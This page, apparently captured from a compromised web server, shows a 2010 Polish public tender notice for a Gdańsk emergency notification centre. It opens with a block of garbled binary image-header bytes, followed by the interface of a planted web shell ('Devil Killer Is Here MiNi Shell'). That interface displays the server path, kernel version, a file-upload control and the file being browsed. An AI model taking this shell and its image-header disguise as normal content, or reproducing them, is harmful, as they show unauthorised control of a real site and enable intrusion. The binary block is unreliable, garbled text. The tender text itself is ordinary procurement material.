JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101012/328918-N-2010.html

<p class="kh_header"><b>Gdańsk: Budowa Centrum Powiadamiania Ratunkowego jako element Zintegrowanego Systemu Ratowniczego województwa pomorskiego</b><br>
<b>Numer ogłoszenia: 328918 - 2010; data zamieszczenia: 12.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Miejska Państwowej Straży Pożarnej , ul. Maurycego Beniowskiego 7, 80-382 Gdańsk, woj. pomorskie, tel. 058 5119570, 7690529, faks 058 5542966.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kmpsp.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Centrum Powiadamiania Ratunkowego jako element Zintegrowanego Systemu Ratowniczego województwa pomorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zaprojektowanie i wykonanie budynku Centrum Powiadamiania Ratunkowego jako elementu Zintegrowanego Systemu Powiadamiania Ratunkowego województwa pomorskiego w Gdańsku. Inwestycja opierać się będzie na rozbudowie budynku Komendy Miejskiej Państwowej Straży Pożarnej w Gdańsku przy ul. Beniowskiego 7 polegająca na dobudowie skrzydła obiektu na działkach 9-1, 9-11, 10-5, 10-7, 23-1 obręb 19 z przeznaczeniem na potrzeby Centrum Powiadamiania Ratunkowego. Przewiduje się dobudowę trzykondygnacyjnego budynku o wymiarach 18,81 x 35,65 m, wys. 10,85 o łącznej powierzchni zabudowy 590 m2 z możliwością poruszania się osób niepełnosprawnych - winda z poziomu 0 obsługująca wszystkie kondygnacje. Założeniem zadania jest wykorzystania przyłączy mediów z budynku Komendy Miejskiej PSP.
W skład budynku będą wchodzić: sala dyspozytorska, pomieszczenia techniczne, sala szkoleniowa, pomieszczenia socjalno-sanitarne, pomieszczenia biurowe, miejsca postojowe w hali garażowej przyziemia. 
Łączna powierzchnia użytkowa to 1565 m2.
Kubatura budynku - 6308 m3.
2. Wykonanie dokumentacji projektowej obejmuje wykonanie wielobranżowej, budowlano-wykonawczej dokumentacji projektowo-kosztorysowej wraz z projektem technologii sali dyspozytorskiej i szkoleniowej obiektu Centrum Powiadamiania Ratunkowego w Gdańsku oraz infrastruktury niezbędnej do jego funkcjonowania w ramach przedsięwzięcia Budowa Centrum Powiadamiania Ratunkowego jako element Zintegrowanego Systemu powiadamiania Ratunkowego województwa pomorskiego.
Podstawę do wykonania przedmiotowej dokumentacji stanowią:
a)	koncepcja programowo-przestrzenna wykonana przez firmę PROMEX - Załącznik Nr 9 do SIWZ,
b)	program funkcjonalno-użytkowy - Załącznik Nr 8 do SIWZ,
c)	dokumentacja geotechniczna dla projektu budowy Centrum Powiadamiania Ratunkowego - Załącznik Nr 10 do SIWZ,
d)	warunki techniczne przyłącza mediów - Załącznik Nr 11 do SIWZ,
e)	wymagania w zakresie ochrony ppoż. do sporządzenia dokumentacji projektowej - Załącznik Nr 12 do SIWZ.
3. Przedmiotowa dokumentacja projektowa obejmuje gotowy do złożenia, w celu uzyskania Decyzji o Pozwolenia na Budowę (DoPnB) wraz ze wszystkimi niezbędnymi do uzyskania DoPnB uzgodnieniami i opiniami, zawierający informacje dotyczące bezpieczeństwa i ochrony zdrowia, sporządzony zgodnie z rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2003 r. Nr 120, poz. 1133 z późn. zm.), projekt w skład którego wchodzi:
3.3.1 Wielobranżowy projekt budowlany obiektu wykonany w 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej 1 CD w formacie PDF w zakresie: 
a)	architektury,
b)	konstrukcji,
c)	instalacji i urządzeń: sanitarnych (wodociągowych i kanalizacyjnych),
d)	instalacji i urządzeń kanalizacji deszczowej ze wszystkimi jej elementami,
e)	instalacji c.o. wraz z modernizacją istniejącego węzła cieplnego budynku Komendy Miejskiej PSP,
f)	instalacji i urządzeń wentylacji mechanicznej (z zastosowaniem centrali z rekuperatorem) i klimatyzacji,
g)	instalacji i urządzeń elektroenergetycznych i oświetleniowych,
h)	instalacji i urządzeń teletechnicznych (telefoniczna, monitoring wewnętrzny i zewnętrzny, Internet, instalacja telewizyjna, światłowodowa, instalacja sygnalizacji alarmu włamania),
i)	instalacji centralnego odkurzacza, 
j)	instalacji windy osobowej,
k)	innych niezbędnych do uzyskania pozwolenia na użytkowanie obiektu zgodnie z jego przeznaczeniem, w tym odgromowych i innych wynikających z przepisów ochrony ppoż.
3.3.2. Wykonany w 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej na CD  w formacie PDF projekt zagospodarowania terenu działki wraz z infrastrukturą techniczną w skład którego wchodzi:
a)	projekt sieci-przyłączy zgodnie z warunkami technicznymi wydanymi przez gestorów uzbrojenia,
b)	dróg dojazdowych i chodników,
c)	zagospodarowanie terenów zielonych.
3.3.3. Wykonany w 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej na CD w formacie PDF projekt technologii sali dyspozytorskiej i szkoleniowej.
3.3.4. Specyfikacja techniczna wykonania i odbioru robót budowlanych w 3 egz. w wersji papierowej i 1 egz. w wersji elektronicznej na CD w formacie PDF.
Przedmiotowe opracowanie zawierające zbiór wymagań, które są niezbędne do określenia standardu i jakości wykonania robot, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót sporządzona zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego. (Dz.U. Nr 202 poz. 2072 z późn. zm.).
3.3.5. Kosztorysy inwestorskie w 2 egz. w wersji papierowej.
Sporządzone zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych robót budowlanych  określonych w programie funkcjonalno-użytkowym (Dz.U. Nr 130, poz. 1389 z późn. zm.). 
Projektant uzgodni z Zamawiającym założenia do kosztorysu inwestorskiego. 
3.3.6. Zbiorcze zestawienie kosztów inwestycji (ZZK) w 1 egzemplarzu w wersji papierowej.
3.3.7. Projekt wykonawczy w 3 egzemplarzach w wersji papierowej i 1 egz. w wersji elektronicznej na CD w formacie PDF w skład którego wchodzi projekt z zakresu:
a)	architektury,
b)	konstrukcji,
c)	wewnętrznych instalacji i urządzeń:
	instalacji i urządzeń: sanitarnych (wodociągowych i kanalizacyjnych),
	c.o. wraz z modernizacją istniejącego węzła cieplnego budynku Komendy Miejskiej PSP,
	wentylacji mechanicznej (z zastosowaniem centrali z rekuperatorem) i klimatyzacji,
	elektroenergetycznych i oświetleniowych (w tym w szczególności: rozdzielnia zewnętrzna, linia kablowa, zasilanie gniazd gospodarczych, zasilanie urządzeń technologicznych, siec systemu kontroli dostępu, zasilanie windy, instalacja niskonapięciowa, oświetlenie awaryjne i ewakuacyjne),
	instalacji i urządzeń teletechnicznych (telefoniczna, monitoring wewnętrzny i zewnętrzny, Internet, instalacja telewizyjna, światłowodowa, instalacja sygnalizacji alarmu włamania),
	instalacji centralnego odkurzacza:
d)	infrastruktury zewnętrznej:
	infrastruktury drogowej - place, drogi dojazdowe, dojścia,
	sieci kanalizacji deszczowej ze wszystkimi jej elementami (tj. studnie rewizyjne, wpusty, odwodnienia liniowe),
	sieci kanalizacji sanitarnej i wodociągowej,
	sieci c.o.,
	sieci elektroenergetycznych i oświetlenia zewnętrznego,
	sieci teletechnicznych (tj. monitoring, alarmy),
	innych niezbędnych do uzyskania pozwolenia na użytkowanie obiektu zgodnie z jego przeznaczeniem, w tym odgromowych i innych wynikających z przepisów ochrony ppoż., zagospodarowania terenów zielonych.

3.4. Zakres robót budowlanych obejmuje:
Wykonanie robót budowlanych polegających na rozbudowie istniejącego, funkcjonującego zgodnie ze swoim przeznaczeniem, budynku Komendy Miejskiej Państwowej Straży Pożarnej oraz JRG 5 w Gdańsku przy ul. Beniowskiego 7 na działkach : 9-1, 9-11,10-5,10-7,23-1 obręb 19, poprzez dobudowanie od strony północnej skrzydła  trzykondygnacyjnego budynku wraz z instalacjami wewnętrznymi i zewnętrznymi, drogami dojazdowymi, chodnikami i zagospodarowaniem terenu zgodnie z opracowaną dokumentacją projektową wraz z projektem technologii sali dyspozytorskiej i szkoleniowej , specyfikacją techniczną wykonania i odbioru robót oraz zgodnie z warunkami pozwolenia na budowę, uzgodnieniami, decyzjami, obowiązującymi przepisami i zasadami wiedzy technicznej i sztuką budowlaną.
Roboty obejmują następujący zakres prac:
a) I etap - przekazanie dokumentacji projektowej - w terminie do dnia 20 grudnia 2010 roku,
b) II etap - wykonanie prac rozbiórkowych, robót ziemnych, uzyskanie ostatecznej decyzji o pozwoleniu na budowę oraz wykonanie części prac budowlanych stanu surowego- w terminie do dnia 31 marca 2011 roku,
c) III etap - zakończenie prac budowlanych stanu surowego, części przyłączy technicznych oraz instalacji wewnętrznych - w terminie do dnia 31 maja 2011 roku,
d) IV etap - zakończenie instalacji przyłączy technicznych, wykonywanie instalacji wewnętrznych, wykonanie części prac wykończeniowych - w terminie do dnia 31 lipca 2011 roku,
e) V etap - wykonywanie instalacji wewnętrznych, wykonanie części prac wykończeniowych, rozpoczęcie prac związanych z zagospodarowaniem terenu -        w terminie do dnia 30 września 2011 roku,
f) VI etap zakończenie wykonywanie instalacji wewnętrznych, wykonywania prac wykończeniowych, prac związanych z zagospodarowaniem terenu, rozruch               i przekazanie obiektu - w terminie do dnia 30 listopada 2011 roku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.30.00-7, 45.21.61.21-8, 45.10.00.00-8, 45.11.12.13-4, 45.31.00.00-3, 45.31.23.10-3, 45.31.31.00-5, 45.31.70.00-2, 45.26.10.00-4, 45.32.00.00-6, 45.33.12.20-4, 45.33.20.00-3, 45.34.30.00-3, 45.43.21.21-8, 45.31.60.00-5, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wadium w wysokości: 20 000,00 zł 
(słownie: dwadzieścia tysięcy 00/100 złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest przedłożyć oświadczenie o treści zgodnej z art. 22 ust.1 UPzp - Załącznik Nr 2 do SIWZ oraz oświadczenie, że osoby które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia jeśli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że w ostatnich 5 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną robotę budowlaną polegającą na zadaniu zaprojektuj i wybuduj obiektu użyteczności publicznej o kubaturze nie mniejszej niż 6500 m3 i wartości nie mniejszej niż 6 mln PLN netto, z podaniem ich rodzaju i wartości, daty i miejsca wykonania, oraz załączeniem dokumentu potwierdzającego, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami zdolnymi do wykonania zamówienia, warunek ten zostanie uznany za spełniony, jeżeli wykonawca wskaże do uczestnictwa w wykonaniu niniejszego zamówienia osoby, odpowiedzialne za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności: 
a)	co najmniej 1 osobę na stanowisku Kierownika Budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno budowlanej , przynależącą do Okręgowej Izby Inżynierów Budownictwa, posiadającą co najmniej 5 letnie doświadczenie zawodowe na stanowisku kierownika budowy,
b)	co najmniej 1 osobę jako  Głównego Projektanta, koordynującego działania zespołu projektowego, posiadającego uprawnienia budowlane do projektowania bez ograniczeń w specjalności budowlano - konstrukcyjnej przynależnego do Izby Inżynierów Budownictwa mającego co najmniej 5 letnie doświadczenie zawodowe przy projektowaniu,
c)	osoby wchodzące w skład wielobranżowego zespołu projektowego posiadające odpowiednie uprawnienia budowlane do projektowania bez ograniczeń, przynależnych do izby zawodowej w specjalnościach: architektonicznej, konstrukcyjno-budowlanej, teletechnicznej, instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej, warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że:
a)	posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 5 mln PLN. W celu potwierdzenia spełnienia niniejszego warunku Wykonawca zobowiązany jest przedłożyć informację z banku lub spółdzielni kasy oszczędnościowo kredytowej ,nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, w którym posiada rachunek, potwierdzające posiadanie środków finansowych w wymaganej wysokości lub posiadanie przez Wykonawcę zdolności kredytowych w wymaganej wysokości, z informacji tej musi jednoznacznie wynikać wysokość żądanej kwoty,
b)	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, w wysokości 1 mln PLN . W celu potwierdzenia spełnienia tego warunku Wykonawca musi złożyć polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza  spełnienie opisanego przez Zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

